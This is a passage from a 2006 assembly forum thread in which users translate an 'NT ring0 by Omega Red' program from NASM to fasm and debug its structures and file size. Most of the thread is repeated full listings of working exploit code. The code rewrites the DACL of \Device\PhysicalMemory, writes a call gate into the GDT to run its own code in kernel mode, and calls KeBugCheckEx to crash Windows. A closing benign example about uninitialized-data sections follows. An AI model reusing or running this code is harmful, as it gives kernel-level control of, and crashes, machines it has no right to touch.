flat assembler
Message board for the users of flat assembler.
Windows > Help translating / fixing huge nasm code (page 2 of 2)
shism2 05 Mar 2006, 19:41
We have some of the equates or structures wrong... That's the only reason it wouldn't work
okasvi 05 Mar 2006, 19:55
Went through all pushes and they seem to be identical (when pushing equates),
so it's most likely a structure... I'm guessing this is wrong:
Code:
EXPLICIT_ACCESS_SIZE equ EXPLICIT_ACCESS_END-EXPLICIT_ACCESS_BEG
access: times EXPLICIT_ACCESS_SIZE dd 0
EXPLICIT_ACCESS_BEG:
struct EXPLICIT_ACCESS
    grfAccessPermissions dd ?
    grfAccessMode dd ?
    grfInheritance dd ?
    Trustee dd ?
ends
struct TRUSTEE
    pMultipleTrustee dd ?
    MultipleTrusteeOperation dd ?
    TrusteeForm dd ?
    TrusteeType dd ?
    ptstrName dd ?
ends
EXPLICIT_ACCESS_END:
okasvi 05 Mar 2006, 20:06
I found the original coder's include files.
Google <3
shism2 05 Mar 2006, 20:16
Where? Where? Show me.
okasvi 05 Mar 2006, 20:55
Eh, somewhat obvious:
Google for "Omega Red" nasm, 1st link -> asm -> inc.zip. Add me on your MSN...
shism2 05 Mar 2006, 22:03
I did, but you don't show up.. Btw, I got it working, and the problem was the obj attributes struct.
shism2 05 Mar 2006, 22:09
Code:
OBJ_CASE_INSENSITIVE equ 40h
OBJ_KERNEL_HANDLE equ 200h
SE_KERNEL_OBJECT equ 6
DACL_SECURITY_INFORMATION equ 4
GRANT_ACCESS equ 1
NO_INHERITANCE equ 0
NO_MULTIPLE_TRUSTEE equ 0
TRUSTEE_IS_NAME equ 1
TRUSTEE_IS_USER equ 1
KGDT_R0_CODE equ 8
REVOKE_ACCESS equ 800
SYSTEM_MODULE_SIZE equ 284
MAX_MODULE_COUNT equ 1024
SYSTEM_MODULE_INFORMATION_SIZE equ 290820
SystemModuleInformation equ 11
MAXIMUM_FILENAME_LENGTH equ 256

gdt:
gdt_limit rw 1
gdt_base rd 1
farcall: rw 3
txtbuf rb 4096
mem_section rd 1
mapped_size rd 1
map_base rd 1
p_old_dacl rd 1
p_new_dacl rd 1
p_sec_descr rd 1
sys_info SYSTEM_INFO
ntoskrnl rd 1
align 4
modinfo rb SYSTEM_MODULE_INFORMATION_SIZE

m_caption db "NT ring0 by Omega Red",0
f_err db "Error: %s, code: 0x%x",0
e_opens1 db "NtOpenSection for DACL access failed",0
e_opens2 db "NtOpenSection for r/w failed",0
e_getsec db "GetSecurityInfo failed",0
e_setacl db "SetEntriesInAclA failed",0
e_setsec db "SetSecurityInfo failed",0
e_maps db "NtMapViewOfSection failed",0
e_unmaps db "NtUnmapViewOfSection failed",0
e_query db "NtQuerySystemInformation failed",0
e_ntos db "ntoskrnl.exe module not found in memory!",0
s_cur_user db "CURRENT_USER",0

align 4
callgate dw 0                 ; low part of address
    dw 8                      ; segment selector: #define KGDT_R0_CODE 8
    dw 1110110000000001b      ; misc bits ;P (5 lowest = # of params)
    dw 0                      ; high part of address

align 4
s_mem_dev_uni du "\Device\PhysicalMemory"
mem_dev_uni_len equ $-s_mem_dev_uni

align 4
mem_dev_name:                 ; unicode_string
    dw mem_dev_uni_len
    dw mem_dev_uni_len+2
    dd s_mem_dev_uni

phys_address dd 0,0

align 4
access: times EXPLICIT_ACCESS_SIZE db 0

align 4
obj_attr:
    dd OBJECT_ATTRIBUTES_SIZE
    dd 0
    dd mem_dev_name
    dd OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE
    dd 0
    dd 0

struct SYSTEM_MODULE
    Reserved1 rd 1
    Reserved2 rd 1
    ImageBaseAddress rd 1
    ImageSize rd 1            ; bytes
    Flags rd 1
    Index rw 1                ; zero based
    wRank rw 1                ; 0 if not assigned
    Unknown rw 1
    ModuleNameOffset rw 1
    ImageName rb MAXIMUM_FILENAME_LENGTH
ends

ring0start:
    mov edi, modinfo
    mov ecx, SYSTEM_MODULE_INFORMATION_SIZE/4
    xor eax, eax
    rep stosd
    ; get allocation granularity (used in memory mapping)
    invoke GetSystemInfo, sys_info
    ; find NtOsKrnl base
    call GetNtoskrnl
    ; open handle to the object
    invoke NtOpenSection, mem_section, WRITE_DAC OR READ_CONTROL, obj_attr
    stdcall NtErrorTest, e_opens1
    ; get security descriptor
    invoke GetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, p_old_dacl, 0, p_sec_descr
    stdcall ErrorTestZ, e_getsec
    ; modify access rights ;]
    mov dword [access+EXPLICIT_ACCESS.grfAccessPermissions], SECTION_ALL_ACCESS
    mov dword [access+EXPLICIT_ACCESS.grfAccessMode], GRANT_ACCESS
    mov dword [access+EXPLICIT_ACCESS.grfInheritance], NO_INHERITANCE
    mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.MultipleTrusteeOperation], NO_MULTIPLE_TRUSTEE
    mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeForm], TRUSTEE_IS_NAME
    mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeType], TRUSTEE_IS_USER
    mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.ptstrName], s_cur_user
    ; create new acl
    invoke SetEntriesInAcl, 1, access, [p_old_dacl], p_new_dacl
    stdcall ErrorTestZ, e_setacl
    ; update security descriptor with new acl
    invoke SetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, [p_new_dacl], 0
    stdcall ErrorTestZ, e_setsec
    invoke LocalFree, [p_sec_descr]
    invoke NtClose, [mem_section]
    ; ok.. now we have writable physical memory ;]
    ; open it in r/w mode
    invoke NtOpenSection, mem_section, SECTION_MAP_READ OR SECTION_MAP_WRITE, obj_attr
    stdcall NtErrorTest, e_opens2
    ; setup callgate (proc offset)
    mov eax, ring0_proc
    mov [callgate], ax
    shr eax, 16
    mov [callgate+6], ax
    ; get gdt
    sgdt [gdt]
    movzx ebx, word [gdt_limit]
    mov eax, [gdt_base]
    call GetPhysicalAddress
    mov [phys_address], eax
    stdcall MapMemory, [gdt_base], ebx, PAGE_READWRITE
    ; install callgate to our ring0 code in gdt - entry #100 (free)
    ; this should *find* some empty descriptor, but i'm too lazy at the moment ;P
    mov eax, [map_base]
    push dword [callgate]
    pop dword [eax+100*8]
    push dword [callgate+4]
    pop dword [eax+100*8+4]
    ; ok.. almost there.. prepare far call
    mov word [farcall+4], 100*8+3 ; our callgate selector
    ; lock the ring0 code to minimize chance that it will be paged out
    ; well, it *can* be paged out, only code in nonpaged kernel pool *can't* be really paged...
    invoke VirtualLock, ring0_proc, ring0_end-ring0_proc
    ; and.. jump!
    push dword [ntoskrnl]
    call far [farcall]
    ; cleanup
    invoke VirtualUnlock, ring0_proc, ring0_end-ring0_proc
    invoke NtUnmapViewOfSection, -1, [map_base]
    stdcall NtErrorTest, e_unmaps
    invoke NtClose, [mem_section]
    ret

;--------------------------------------------------------------------
GetNtoskrnl:
    ; enum modules
    invoke NtQuerySystemInformation, SystemModuleInformation, modinfo, SYSTEM_MODULE_INFORMATION_SIZE, 0
    stdcall NtErrorTest, e_query
    mov ebx, dword [modinfo]  ; count
    mov esi, modinfo+4        ; 1st module
.1: ; loop
    mov edi, esi
    add edi, SYSTEM_MODULE.ImageName
    invoke PathFindFileName, edi
    or dword [eax], 20202020h ; convert to lowercase
    cmp dword [eax], 'ntos'
    jne .2
    or dword [eax+4], 20202020h
    cmp dword [eax+4], 'krnl'
    jne .2
    or dword [eax+8], 20202020h
    cmp dword [eax+8], '.exe'
    jne .2
    ; ok, seems we have it (although should check for 0 at the end, maybe its `ntoskrnl.exe.blah' ;P)
    mov eax, dword [esi+SYSTEM_MODULE.ImageBaseAddress] ; base in memory
    mov [ntoskrnl], eax
    ret
.2:
    add esi, SYSTEM_MODULE_SIZE
    dec ebx
    jns .1
    ; umm.. ntoskrnl not found - quite unlikely to happen ;]
    invoke MessageBox, 0, e_ntos, 0, 0
    invoke ExitProcess, 2

;--------------------------------------------------------------------
; substitute for MmGetPhysicalAddress - not always ok, but for this purpose sufficient
; input: linear address in eax
GetPhysicalAddress:
    cmp eax, 80000000h
    jae .1
    cmp eax, 0A0000000h
    jb .1
    and eax, 0FFFF000h
    ret
.1:
    and eax, 1FFFF000h
    ret

;--------------------------------------------------------------------
; maps memory using \Device\PhysicalMemory
proc MapMemory, base, size, access_mode
    mov eax, [base]           ; address
    xor edx, edx
    push eax
    div dword [sys_info+SYSTEM_INFO.dwAllocationGranularity] ; edx = offset
    mov edi, edx
    pop eax
    mov ebx, [size]           ; size
    inc ebx
    mov esi, ebx              ; mapped size
    add esi, edi
    sub eax, edi
    call GetPhysicalAddress
    mov [phys_address], eax
    mov [mapped_size], esi
    mov eax, [mem_section]
    invoke NtMapViewOfSection, eax, -1, map_base, 0, esi, phys_address, mapped_size, 1, 0, [access_mode]
    add [map_base], edi
    stdcall NtErrorTest, e_maps
    ret
endp

;--------------------------------------------------------------------
proc NtErrorTest, er_msg
    test eax, eax
    jz .ok
    invoke wsprintf, txtbuf, f_err, [er_msg], eax
    invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
    invoke NtClose, [mem_section]
    invoke ExitProcess, 1
.ok:
    ret
endp

;--------------------------------------------------------------------
proc ErrorTest, e_msg
    test eax, eax
    jnz .ok
    invoke GetLastError       ; was "call GetLastError": that would call the import table entry itself, not the function
    invoke wsprintf, txtbuf, f_err, [e_msg], eax
    invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
    invoke NtClose, [mem_section]
    invoke ExitProcess, 1
.ok:
    ret
endp

;--------------------------------------------------------------------
proc ErrorTestZ, e1_msg
    test eax, eax
    jz .ok
    invoke GetLastError
    invoke wsprintf, txtbuf, f_err, [e1_msg], eax
    invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
    invoke NtClose, [mem_section]
    invoke ExitProcess, 1
.ok:
    ret
endp

;--------------------------------------------------------------------
; the real deal ;]
ring0_proc:
    cli
    mov eax, [esp+8]          ; param - ntoskrnl base
    push ebx
    push edx
    push esi
    push edi
    ; find KeBugCheckEx in exports
    mov ebx, eax
    add eax, [eax+0x3c]
    mov edi, dword [eax+0x78]
    add edi, ebx
    mov esi, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
    add esi, ebx
    xor edx, edx
.name:
    mov eax, [esi]
    add eax, ebx
    ; check function name
    cmp dword [eax+00h], "KeBu"
    jne .F
    cmp dword [eax+04h], "gChe"
    jne .F
    cmp dword [eax+08h], "ckEx"
    jne .F
    mov eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfOrdinals]
    add eax, ebx
    movzx esi, word [edx*2+eax]
    mov eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
    add eax, ebx
    mov esi, [esi*4+eax]
    add esi, ebx
    jmp .fnd
.F:
    add esi, 4
    inc edx
    cmp edx, [edi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
    jne .name
.fnd:
    mov eax, esi
    pop edi
    pop esi
    pop edx
    pop ebx
    ; int3
    stdcall eax, 0xdeadbeef, 0xdead, 0xbeef, 0xcafe, 0xbabe
    retf 4
ring0_end:
shism2 06 Mar 2006, 03:24
The only problem now is that the file IS HUGE compared to the original nasm file.. And the problem causing that is
modinfo rb SYSTEM_MODULE_INFORMATION_SIZE
LocoDelAssembly 06 Mar 2006, 04:04
Move it to the end of the source code. In fact, to save even more space, put ALL the uninitialized data joined together at the end of the source.
okasvi 06 Mar 2006, 04:22
Reorder your sources to be like this:
1st [---equ's---]
2nd [---code---]
3rd
Code:
;--------------------------------------------------------------------
section '.data' data readable writeable

m_caption db "NT ring0 by Omega Red",0
f_err db "Error: %s, code: 0x%x",0
e_opens1 db "NtOpenSection for DACL access failed",0
e_opens2 db "NtOpenSection for r/w failed",0
e_getsec db "GetSecurityInfo failed",0
e_setacl db "SetEntriesInAclA failed",0
e_setsec db "SetSecurityInfo failed",0
e_maps db "NtMapViewOfSection failed",0
e_unmaps db "NtUnmapViewOfSection failed",0
e_query db "NtQuerySystemInformation failed",0
e_ntos db "ntoskrnl.exe module not found in memory!",0
s_cur_user db "CURRENT_USER",0

align 4
callgate dw 0                 ; low part of address
    dw 8                      ; segment selector: #define KGDT_R0_CODE 8
    dw 1110110000000001b      ; misc bits ;P (5 lowest = # of params)
    dw 0                      ; high part of address

align 4
s_mem_dev_uni du "\Device\PhysicalMemory"
mem_dev_uni_len equ $-s_mem_dev_uni

align 4
mem_dev_name:                 ; unicode_string
    dw mem_dev_uni_len
    dw mem_dev_uni_len+2
    dd s_mem_dev_uni

phys_address dd 0,0

align 4
OBJECT_ATTRIBUTES_SIZE equ 24
obj_attr:
    dd OBJECT_ATTRIBUTES_SIZE
    dd 0
    dd mem_dev_name
    dd OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE
    dd 0
    dd 0

align 4
EXPLICIT_ACCESS_SIZE equ 32
access: times EXPLICIT_ACCESS_SIZE dd 0

align 4
struct TRUSTEE
    pMultipleTrustee rd 1
    MultipleTrusteeOperation rd 1
    TrusteeForm rd 1
    TrusteeType rd 1
    ptstrName rd 1
ends
TRUSTEE_SIZE equ 20

align 4
struct EXPLICIT_ACCESS
    grfAccessPermissions rd 1
    grfAccessMode rd 1
    grfInheritance rd 1
    Trustee rb TRUSTEE_SIZE
ends

struct SYSTEM_MODULE_INFORMATION
    dCount rd 1
    m_tam rb SYSTEM_MODULE_SIZE*MAX_MODULE_COUNT ; arbitrary max count - not defined anywhere
ends

struct SYSTEM_MODULE
    dReserved01 rd 1
    d04 rd 1
    pAddress rd 1
    dSize rd 1                ; bytes
    dFlags rd 1
    wId rw 1                  ; zero based
    wRank rw 1                ; 0 if not assigned
    w18 rw 1
    wNameOffset rw 1
    abName rb MAXIMUM_FILENAME_LENGTH
ends

;--------------------------------------------------------------------
section '.idata' import data readable writeable

library ntdll,'ntdll.dll',\
        shlwapi,'shlwapi.dll',\
        kernel32,'kernel32.dll',\
        user32,'user32.dll',\
        advapi32,'advapi32.dll'

import shlwapi,\
       PathFindFileName,'PathFindFileNameA'

import ntdll,\
       NtClose,'NtClose',\
       NtMapViewOfSection,'NtMapViewOfSection',\
       NtOpenSection,'NtOpenSection',\
       NtQuerySystemInformation,'NtQuerySystemInformation',\
       NtUnmapViewOfSection,'NtUnmapViewOfSection'

import kernel32,\
       GetProcAddress,'GetProcAddress',\
       GetSystemInfo,'GetSystemInfo',\
       ExitProcess,'ExitProcess',\
       LoadLibrary,'LoadLibraryA',\
       LocalFree,'LocalFree',\
       VirtualLock,'VirtualLock',\
       VirtualUnlock,'VirtualUnlock'

import advapi32,\
       GetSecurityInfo,'GetSecurityInfo',\
       SetEntriesInAcl,'SetEntriesInAclA',\
       SetSecurityInfo,'SetSecurityInfo'

import user32,\
       MessageBox,'MessageBoxA',\
       wsprintf,'wsprintfA'

section '.udata' readable writeable

struct IMAGE_EXPORT_DIRECTORY
    Characteristics rd 1
    TimeDateStamp rd 1
    MajorVersion rw 1
    MinorVersion rw 1
    nName rd 1
    nBase rd 1
    NumberOfFunctions rd 1
    NumberOfNames rd 1
    AddressOfFunctions rd 1
    AddressOfNames rd 1
    AddressOfNameOrdinals rd 1
ends

gdt:
gdt_limit rw 1
gdt_base rd 1
farcall: rw 3
txtbuf rb 4096
mem_section rd 1
mapped_size rd 1
map_base rd 1
p_old_dacl rd 1
p_new_dacl rd 1
p_sec_descr rd 1
sys_info SYSTEM_INFO
ntoskrnl rd 1
align 4
modinfo rb SYSTEM_MODULE_INFORMATION_SIZE
madmatt 06 Mar 2006, 06:46
You need to put your large data into a ".bss" section.
LocoDelAssembly 06 Mar 2006, 13:52
Well, if you put the data in a separate section then you don't need to put uninitialized data at the end of the source but at the end of the section, and the section can be placed anywhere.
shism2 06 Mar 2006, 19:26
Still got the problem:
Code:
OBJ_CASE_INSENSITIVE equ 40h
OBJ_KERNEL_HANDLE equ 200h
SE_KERNEL_OBJECT equ 6
DACL_SECURITY_INFORMATION equ 4
GRANT_ACCESS equ 1
NO_INHERITANCE equ 0
NO_MULTIPLE_TRUSTEE equ 0
TRUSTEE_IS_NAME equ 1
TRUSTEE_IS_USER equ 1
KGDT_R0_CODE equ 8
REVOKE_ACCESS equ 800
SYSTEM_MODULE_SIZE equ 284
MAX_MODULE_COUNT equ 1024
SYSTEM_MODULE_INFORMATION_SIZE equ 290820
SystemModuleInformation equ 11
MAXIMUM_FILENAME_LENGTH equ 256

ring0start:
    mov edi, modinfo
    mov ecx, SYSTEM_MODULE_INFORMATION_SIZE/4
    xor eax, eax
    rep stosd
    ; get allocation granularity (used in memory mapping)
    invoke GetSystemInfo, sys_info
    ; find NtOsKrnl base
    call GetNtoskrnl
    ; open handle to the object
    invoke NtOpenSection, mem_section, WRITE_DAC OR READ_CONTROL, obj_attr
    stdcall NtErrorTest, e_opens1
    ; get security descriptor
    invoke GetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, p_old_dacl, 0, p_sec_descr
    stdcall ErrorTestZ, e_getsec
    ; modify access rights ;]
    mov dword [access+EXPLICIT_ACCESS.grfAccessPermissions], SECTION_ALL_ACCESS
    mov dword [access+EXPLICIT_ACCESS.grfAccessMode], GRANT_ACCESS
    mov dword [access+EXPLICIT_ACCESS.grfInheritance], NO_INHERITANCE
    mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.MultipleTrusteeOperation], NO_MULTIPLE_TRUSTEE
    mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeForm], TRUSTEE_IS_NAME
    mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.TrusteeType], TRUSTEE_IS_USER
    mov dword [access+EXPLICIT_ACCESS.Trustee+TRUSTEE.ptstrName], s_cur_user
    ; create new acl
    invoke SetEntriesInAcl, 1, access, [p_old_dacl], p_new_dacl
    stdcall ErrorTestZ, e_setacl
    ; update security descriptor with new acl
    invoke SetSecurityInfo, [mem_section], SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, [p_new_dacl], 0
    stdcall ErrorTestZ, e_setsec
    invoke LocalFree, [p_sec_descr]
    invoke NtClose, [mem_section]
    ; ok.. now we have writable physical memory ;]
    ; open it in r/w mode
    invoke NtOpenSection, mem_section, SECTION_MAP_READ OR SECTION_MAP_WRITE, obj_attr
    stdcall NtErrorTest, e_opens2
    ; setup callgate (proc offset)
    mov eax, ring0_proc
    mov [callgate], ax
    shr eax, 16
    mov [callgate+6], ax
    ; get gdt
    sgdt [gdt]
    movzx ebx, word [gdt_limit]
    mov eax, [gdt_base]
    call GetPhysicalAddress
    mov [phys_address], eax
    stdcall MapMemory, [gdt_base], ebx, PAGE_READWRITE
    ; install callgate to our ring0 code in gdt - entry #100 (free)
    ; this should *find* some empty descriptor, but i'm too lazy at the moment ;P
    mov eax, [map_base]
    push dword [callgate]
    pop dword [eax+100*8]
    push dword [callgate+4]
    pop dword [eax+100*8+4]
    ; ok.. almost there.. prepare far call
    mov word [farcall+4], 100*8+3 ; our callgate selector
    ; lock the ring0 code to minimize chance that it will be paged out
    ; well, it *can* be paged out, only code in nonpaged kernel pool *can't* be really paged...
    invoke VirtualLock, ring0_proc, ring0_end-ring0_proc
    ; and.. jump!
    push dword [ntoskrnl]
    call far [farcall]
    ; cleanup
    invoke VirtualUnlock, ring0_proc, ring0_end-ring0_proc
    invoke NtUnmapViewOfSection, -1, [map_base]
    stdcall NtErrorTest, e_unmaps
    invoke NtClose, [mem_section]
    ret

;--------------------------------------------------------------------
GetNtoskrnl:
    ; enum modules
    invoke NtQuerySystemInformation, SystemModuleInformation, modinfo, SYSTEM_MODULE_INFORMATION_SIZE, 0
    stdcall NtErrorTest, e_query
    mov ebx, dword [modinfo]  ; count
    mov esi, modinfo+4        ; 1st module
.1: ; loop
    mov edi, esi
    add edi, SYSTEM_MODULE.ImageName
    invoke PathFindFileName, edi
    or dword [eax], 20202020h ; convert to lowercase
    cmp dword [eax], 'ntos'
    jne .2
    or dword [eax+4], 20202020h
    cmp dword [eax+4], 'krnl'
    jne .2
    or dword [eax+8], 20202020h
    cmp dword [eax+8], '.exe'
    jne .2
    ; ok, seems we have it (although should check for 0 at the end, maybe its `ntoskrnl.exe.blah' ;P)
    mov eax, dword [esi+SYSTEM_MODULE.ImageBaseAddress] ; base in memory
    mov [ntoskrnl], eax
    ret
.2:
    add esi, SYSTEM_MODULE_SIZE
    dec ebx
    jns .1
    ; umm.. ntoskrnl not found - quite unlikely to happen ;]
    invoke MessageBox, 0, e_ntos, 0, 0
    invoke ExitProcess, 2

;--------------------------------------------------------------------
; substitute for MmGetPhysicalAddress - not always ok, but for this purpose sufficient
; input: linear address in eax
GetPhysicalAddress:
    cmp eax, 80000000h
    jae .1
    cmp eax, 0A0000000h
    jb .1
    and eax, 0FFFF000h
    ret
.1:
    and eax, 1FFFF000h
    ret

;--------------------------------------------------------------------
; maps memory using \Device\PhysicalMemory
proc MapMemory, base, size, access_mode
    mov eax, [base]           ; address
    xor edx, edx
    push eax
    div dword [sys_info+SYSTEM_INFO.dwAllocationGranularity] ; edx = offset
    mov edi, edx
    pop eax
    mov ebx, [size]           ; size
    inc ebx
    mov esi, ebx              ; mapped size
    add esi, edi
    sub eax, edi
    call GetPhysicalAddress
    mov [phys_address], eax
    mov [mapped_size], esi
    mov eax, [mem_section]
    invoke NtMapViewOfSection, eax, -1, map_base, 0, esi, phys_address, mapped_size, 1, 0, [access_mode]
    add [map_base], edi
    stdcall NtErrorTest, e_maps
    ret
endp

;--------------------------------------------------------------------
proc NtErrorTest, er_msg
    test eax, eax
    jz .ok
    invoke wsprintf, txtbuf, f_err, [er_msg], eax
    invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
    invoke NtClose, [mem_section]
    invoke ExitProcess, 1
.ok:
    ret
endp

;--------------------------------------------------------------------
proc ErrorTest, e_msg
    test eax, eax
    jnz .ok
    invoke GetLastError       ; was "call GetLastError": that would call the import table entry itself, not the function
    invoke wsprintf, txtbuf, f_err, [e_msg], eax
    invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
    invoke NtClose, [mem_section]
    invoke ExitProcess, 1
.ok:
    ret
endp

;--------------------------------------------------------------------
proc ErrorTestZ, e1_msg
    test eax, eax
    jz .ok
    invoke GetLastError
    invoke wsprintf, txtbuf, f_err, [e1_msg], eax
    invoke MessageBox, 0, txtbuf, m_caption, MB_ICONWARNING
    invoke NtClose, [mem_section]
    invoke ExitProcess, 1
.ok:
    ret
endp

;--------------------------------------------------------------------
; the real deal ;]
ring0_proc:
    cli
    mov eax, [esp+8]          ; param - ntoskrnl base
    push ebx
    push edx
    push esi
    push edi
    ; find KeBugCheckEx in exports
    mov ebx, eax
    add eax, [eax+0x3c]
    mov edi, dword [eax+0x78]
    add edi, ebx
    mov esi, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
    add esi, ebx
    xor edx, edx
.name:
    mov eax, [esi]
    add eax, ebx
    ; check function name
    cmp dword [eax+00h], "KeBu"
    jne .F
    cmp dword [eax+04h], "gChe"
    jne .F
    cmp dword [eax+08h], "ckEx"
    jne .F
    mov eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfOrdinals]
    add eax, ebx
    movzx esi, word [edx*2+eax]
    mov eax, [edi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
    add eax, ebx
    mov esi, [esi*4+eax]
    add esi, ebx
    jmp .fnd
.F:
    add esi, 4
    inc edx
    cmp edx, [edi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
    jne .name
.fnd:
    mov eax, esi
    pop edi
    pop esi
    pop edx
    pop ebx
    ; int3
    stdcall eax, 0xdeadbeef, 0xdead, 0xbeef, 0xcafe, 0xbabe
    retf 4
ring0_end:

section '.bss' readable writeable

gdt:
gdt_limit rw 1
gdt_base rd 1
farcall: rw 3
txtbuf rb 4096
mem_section rd 1
mapped_size rd 1
map_base rd 1
p_old_dacl rd 1
p_new_dacl rd 1
p_sec_descr rd 1
sys_info SYSTEM_INFO
ntoskrnl rd 1
align 4
modinfo rb SYSTEM_MODULE_INFORMATION_SIZE

m_caption db "NT ring0 by Omega Red",0
f_err db "Error: %s, code: 0x%x",0
e_opens1 db "NtOpenSection for DACL access failed",0
e_opens2 db "NtOpenSection for r/w failed",0
e_getsec db "GetSecurityInfo failed",0
e_setacl db "SetEntriesInAclA failed",0
e_setsec db "SetSecurityInfo failed",0
e_maps db "NtMapViewOfSection failed",0
e_unmaps db "NtUnmapViewOfSection failed",0
e_query db "NtQuerySystemInformation failed",0
e_ntos db "ntoskrnl.exe module not found in memory!",0
s_cur_user db "CURRENT_USER",0

align 4
callgate dw 0                 ; low part of address
    dw 8                      ; segment selector: #define KGDT_R0_CODE 8
    dw 1110110000000001b      ; misc bits ;P (5 lowest = # of params)
    dw 0                      ; high part of address

align 4
s_mem_dev_uni du "\Device\PhysicalMemory"
mem_dev_uni_len equ $-s_mem_dev_uni

align 4
mem_dev_name:                 ; unicode_string
    dw mem_dev_uni_len
    dw mem_dev_uni_len+2
    dd s_mem_dev_uni

phys_address dd 0,0

align 4
access: times EXPLICIT_ACCESS_SIZE db 0

align 4
obj_attr:
    dd OBJECT_ATTRIBUTES_SIZE
    dd 0
    dd mem_dev_name
    dd OBJ_CASE_INSENSITIVE OR OBJ_KERNEL_HANDLE
    dd 0
    dd 0

struct SYSTEM_MODULE
    Reserved1 rd 1
    Reserved2 rd 1
    ImageBaseAddress rd 1
    ImageSize rd 1            ; bytes
    Flags rd 1
    Index rw 1                ; zero based
    wRank rw 1                ; 0 if not assigned
    Unknown rw 1
    ModuleNameOffset rw 1
    ImageName rb MAXIMUM_FILENAME_LENGTH
ends
okasvi 06 Mar 2006, 22:42
OK, here it is, 4 KB in size; somewhat ugly source, but I was just converting it to fasm without thinking about what it looks like...
shism2 06 Mar 2006, 22:49
asdfasdf
LocoDelAssembly 07 Mar 2006, 04:51
shism2, you still get the same problem because you created a new section but with the uninitialized data placed before the initialized data. You can fix it by adding a new section for uninitialized data (like okasvi), or:
LocoDelAssembly wrote:
if you put the data in a separate section then you don't need to put uninitialized data at the end of the source but at the end of the section, and the section can be placed anywhere.
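To see the section rule from this thread in isolation, here is a minimal fasm PE (an added example, not code from the thread or from the original program) that reserves a 290820-byte buffer like modinfo but keeps it out of the file; the section and label names, the message text and the `cinvoke` for the cdecl wsprintf are my choices, not the thread's.

```asm
; Added example: uninitialized data in its own section costs nothing on disk.
format PE GUI 4.0
entry start

include 'win32a.inc'

; constructed value, same size as the thread's modinfo buffer
SYSTEM_MODULE_INFORMATION_SIZE equ 290820

section '.text' code readable executable

start:
    ; touch the whole buffer so it is really committed at run time
    mov     edi, modinfo
    mov     ecx, SYSTEM_MODULE_INFORMATION_SIZE/4
    xor     eax, eax
    rep     stosd
    ; wsprintf is cdecl, so use cinvoke (the caller cleans the stack)
    cinvoke wsprintf, txtbuf, f_fmt, SYSTEM_MODULE_INFORMATION_SIZE
    invoke  MessageBox, 0, txtbuf, m_caption, 0
    invoke  ExitProcess, 0

section '.data' data readable writeable

    ; initialized data only: every byte here is written to the file,
    ; and so would any rb/rd placed BEFORE it in the same section
    m_caption db 'uninitialized data demo',0
    f_fmt     db 'modinfo reserves %u bytes in memory, none in the file',0

section '.idata' import data readable writeable

    library kernel32,'kernel32.dll',\
            user32,'user32.dll'

    import  kernel32,\
            ExitProcess,'ExitProcess'

    import  user32,\
            MessageBox,'MessageBoxA',\
            wsprintf,'wsprintfA'

section '.bss' readable writeable

    ; uninitialized data only: fasm stores a section only up to its last
    ; initialized byte, so this section has no raw data in the PE and the
    ; loader just reserves the pages (VirtualSize > SizeOfRawData = 0).
    ; Placed last here, as in okasvi's layout, but any position works as
    ; long as no db/dd follows the rb/rd inside the section.
    txtbuf   rb 256
    modinfo  rb SYSTEM_MODULE_INFORMATION_SIZE
```

Assemble both orderings of the '.data' and '.bss' contents and compare the output sizes, or read the section table with any PE viewer: the file stays a few kilobytes only when every rb/rd is trailing in its section.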
Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.
Website powered by rwasa.